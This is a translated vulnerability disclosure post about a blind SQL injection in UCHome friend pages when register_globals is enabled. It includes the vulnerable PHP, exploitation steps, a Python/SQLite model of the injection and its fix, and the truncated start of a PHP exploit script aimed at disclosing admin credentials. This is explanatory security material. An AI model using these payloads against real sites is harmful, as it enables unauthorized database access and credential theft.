Oldjun.com
This injection has existed since version 1.2. Back around the end of 1.5, when that was the version in wide use, we had to build a UCHome site, so I read the source code and found this spot. I wrote a throwaway exploit, and it then lay forgotten on my hard disk for more than a year. A few days ago I saw that it still exists in version 2.0 and asked flyh4t whether to publish it. Now that xhming has published it, let me talk about it. I suspect many experts have also been keeping it as a reserve 0day for a long time.
There are two reasons it is of limited value:
1. The vulnerability requires global variables to be enabled, that is, register_globals = On;
2. Because of UCenter's security design, even if you inject out the password, it does not get you far against the other products.
So here is the vulnerable code, from the friend-list page reached through cp.php?ac=friend:
if ($space['friendnum']) { // you must have friends to reach this code
    $groups = getfriendgroup();
    $theurl = 'cp.php?ac=friend&op=group';
    $group = !isset($_GET['group']) ? -1 : intval($_GET['group']);
    if ($group > -1) { // the attacker controls this: simply omit ?group and the branch is skipped
        $wheresql = "AND main.gid=$group"; // $wheresql is never initialized before this branch
        $theurl .= "&group=$group";
    }
    // with register_globals=On and no ?group, $wheresql is whatever the request supplied
    $count = $_SGLOBAL['db']->result($_SGLOBAL['db']->query("SELECT COUNT(*) FROM ".tname('friend')." main
        WHERE main.uid=$space[uid] AND main.status=1 $wheresql"), 0);
    $query = $_SGLOBAL['db']->query("SELECT main.fuid AS uid, main.fusername AS username, main.gid, main.num FROM ".tname('friend')." main
        WHERE main.uid=$space[uid] AND main.status=1 $wheresql
        ORDER BY main.dateline DESC
        LIMIT $start,$perpage");
    while ($value = $_SGLOBAL['db']->fetch_array($query)) {
        realname_set($value['uid'], $value['username']);
        $value['group'] = $groups[$value['gid']];
        $list[] = $value;
    }
    $multi = multi($count, $perpage, $page, $theurl);
}
This is the same pattern as the injection exposed in ECShop last year, and the exploitation condition is the same: register_globals = On is required.
It leaves you speechless that the programmers still have not fixed it in the upgraded versions ~
Exploitation, with register_globals on:
1. Register an account, log in, and add some friends; the account must have friends, otherwise $space['friendnum'] is zero and the code is never reached;
2. Because the same $wheresql is spliced into both SQL statements, and the two SELECTs return a different number of columns, a UNION SELECT payload is inconvenient (one payload cannot satisfy both), so just do blind injection. Here is a simple exploit:
Silly question: what use is the injected password? :)
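As an added worked example (not code from this page or from UCHome), here is the vulnerable flow above modelled in Python against an in-memory SQLite table standing in for the MySQL friend table. It shows register_globals pre-seeding $wheresql from the query string, the boolean oracle the count query gives a blind injection, why a one-column UNION payload breaks the four-column list query while passing the COUNT query, and the one-line fix of initialising $wheresql before the branch. The table name uchome_friend, the sample rows and the function names are constructed assumptions.

```python
"""Model of the UCHome friend-page flaw: `$wheresql` is only assigned inside
`if ($group > -1)`, so with register_globals=On a request parameter named
`wheresql` seeds the variable before the script runs and lands verbatim in
both SQL statements. Python stand-in for the PHP flow; sqlite3 stands in for
MySQL (constructed sample data, not a real UCHome database)."""
import sqlite3


def intval(value):
    """Approximate PHP intval(): leading integer of the string, else 0."""
    s = str(value).strip()
    sign, i = 1, 0
    if s and s[0] in "+-":
        sign = -1 if s[0] == "-" else 1
        i = 1
    digits = ""
    while i < len(s) and s[i].isdigit():
        digits += s[i]
        i += 1
    return sign * int(digits) if digits else 0


def build_wheresql(get_params, register_globals, hardened=False):
    """Return the $wheresql fragment the PHP ends up with.

    register_globals=True: every GET key is already a PHP variable when the
    script starts, so $wheresql = $_GET['wheresql'] unless the code assigns it.
    hardened=True: the fix, `$wheresql = '';` before the branch.
    """
    scope = dict(get_params) if register_globals else {}
    if hardened:
        scope["wheresql"] = ""  # initialise before use; request value discarded
    group = -1 if "group" not in get_params else intval(get_params["group"])
    if group > -1:
        scope["wheresql"] = f"AND main.gid={group}"
    # An undefined PHP variable interpolates as '' (with a notice).
    return scope.get("wheresql", "")


def friend_queries(uid, wheresql, start=0, perpage=20):
    """The two statements from the friend page, with $wheresql spliced in unchanged."""
    count_sql = (f"SELECT COUNT(*) FROM uchome_friend main "
                 f"WHERE main.uid={uid} AND main.status=1 {wheresql}")
    list_sql = (f"SELECT main.fuid AS uid, main.fusername AS username, main.gid, main.num "
                f"FROM uchome_friend main WHERE main.uid={uid} AND main.status=1 {wheresql} "
                f"ORDER BY main.dateline DESC LIMIT {start},{perpage}")
    return count_sql, list_sql


def sample_db():
    """Constructed friend table: uid 1 has two confirmed friends and one pending."""
    conn = sqlite3.connect(":memory:")
    conn.executescript("""
        CREATE TABLE uchome_friend(uid INT, fuid INT, fusername TEXT, gid INT,
                                   num INT, status INT, dateline INT);
        INSERT INTO uchome_friend VALUES (1, 2, 'bob',   0, 0, 1, 100);
        INSERT INTO uchome_friend VALUES (1, 3, 'carol', 2, 0, 1, 200);
        INSERT INTO uchome_friend VALUES (1, 4, 'dave',  0, 0, 0, 300);
        INSERT INTO uchome_friend VALUES (9, 1, 'alice', 0, 0, 1, 400);
    """)
    return conn


def friend_page(conn, uid, get_params, register_globals=True, hardened=False):
    """Run both statements the way the PHP does; return (count, rows), or
    ("error", message) if one of them fails (the page would break on the site)."""
    wheresql = build_wheresql(get_params, register_globals, hardened)
    count_sql, list_sql = friend_queries(uid, wheresql)
    try:
        count = conn.execute(count_sql).fetchone()[0]
        rows = conn.execute(list_sql).fetchall()
    except sqlite3.OperationalError as e:
        return "error", str(e)
    return count, rows


if __name__ == "__main__":
    db = sample_db()
    # Legitimate use: ?group=2 filters by group.
    print(friend_page(db, 1, {"group": "2"}))
    # register_globals=On and no ?group: attacker-chosen ?wheresql=... reaches SQL.
    print(friend_page(db, 1, {"wheresql": "AND 1=1"}))  # all friends listed
    print(friend_page(db, 1, {"wheresql": "AND 1=2"}))  # none listed: boolean oracle
    # A UNION payload fits the one-column COUNT query but not the four-column list.
    print(friend_page(db, 1, {"wheresql": "UNION SELECT 1"}))
    # The fix: initialise $wheresql, so the injected value never reaches SQL.
    print(friend_page(db, 1, {"wheresql": "AND 1=2"}, hardened=True))
```

The blind oracle is the difference between the two `AND 1=1` / `AND 1=2` responses (friend list present or empty); the UNION case illustrates the note above that one payload cannot satisfy both statements.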
<?php
print_r('
--------------------------------------------------------------------------------
UChome <=2.0 "wheresql" blind SQL injection/admin credentials disclosure exploit
BY oldjun
--------------------------------------------------------------------------------
');
if ($argc < 4) {
    print_r('
--------------------------------------------------------------------------------
Usage: php '.$argv[0].' host path uid
host: target server (ip/hostname)
path: path to UChome
uid: uid on the target UChome (the account must have friends)
Example:
php '.$argv[0].' localhost / 1
--------------------------------------------------------------------------------
');
    die;
}
// Send a raw HTTP request to $host on port 80 and collect the whole response in $html.
function sendpacketii($packet)
{
    global $host, $html;
    $ock = fsockopen(gethostbyname($host), 80);
    if (!$ock) {
        echo 'No response from '.$host;
        die;
    }
    fputs($ock, $packet);
    $html = '';
    while (!feof($ock)) {
        $html .= fgets($ock);
    }
    fclose($ock);
}
$host = $argv[1];
$path = $argv[2]; // (the exploit listing is cut off here on the page)